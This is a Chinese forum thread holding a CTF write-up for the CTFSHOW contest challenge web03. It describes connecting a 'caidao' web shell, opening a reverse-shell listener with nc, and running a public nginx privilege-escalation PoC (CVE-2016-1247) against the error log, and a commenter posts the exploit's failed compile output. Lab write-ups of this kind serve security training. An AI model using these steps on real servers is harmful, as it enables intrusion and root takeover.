CTFSHOW内部赛 web03_出题人不想跟你说话.jpg

>

This site is best viewed in a modern browser with JavaScript enabled.

### id="flarum-content">

CTFSHOW内部赛 web03_出题人不想跟你说话.jpg

_yu_

0x01

根据网站里面隐晦的提示，猜测可能需要连菜刀，而且图片上有个cai可能是连接的密码。
果然如此，那我们直接找flag吧，发现flag在根目录下，但是没有权限打开。那就得提权了

0x02

根据提示说漏洞每2分钟触发一次，猜测可能有定时任务可利用，cat /etc/crontab

这个定时任务很可疑呀 一分钟一次，在网上经过各种搜索发现了nginx提权漏洞CVE-2016-1247，大家有兴趣的可以去仔细研究下。看下影响版本，正好在里面
，
在网上查到了利用的方法。
1.反弹shell
我们先用ssh连接题目给的服务器用于反弹shell，ssh -p8022 [email protected]
输入密码ctfshow，成功连接，接着开启监听 nc -lvp 8888，被攻击的系统开启反弹。


2.下载所需的poc
https://www.seebug.org/vuldb/ssvid-92538
然后通过菜刀添加到目录中

3.使用poc

chmod +x nginx.sh
./nginx.sh
./nginx.sh /var/log/nginx/error.log

接着等待漏洞触发即可

Jazz

自闭.jpg

fzhshzh

执行nignx.sh报错是什么原因
[+] Starting the exploit as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Compiling the privesc shared library (/tmp/privesclib.c)
gcc: error trying to exec 'cc1': execvp: No such file or directory

[!] Failed to compile the privesc lib /tmp/privesclib.c.

[+] Cleaning up...

[+] Job done. Exiting with code 2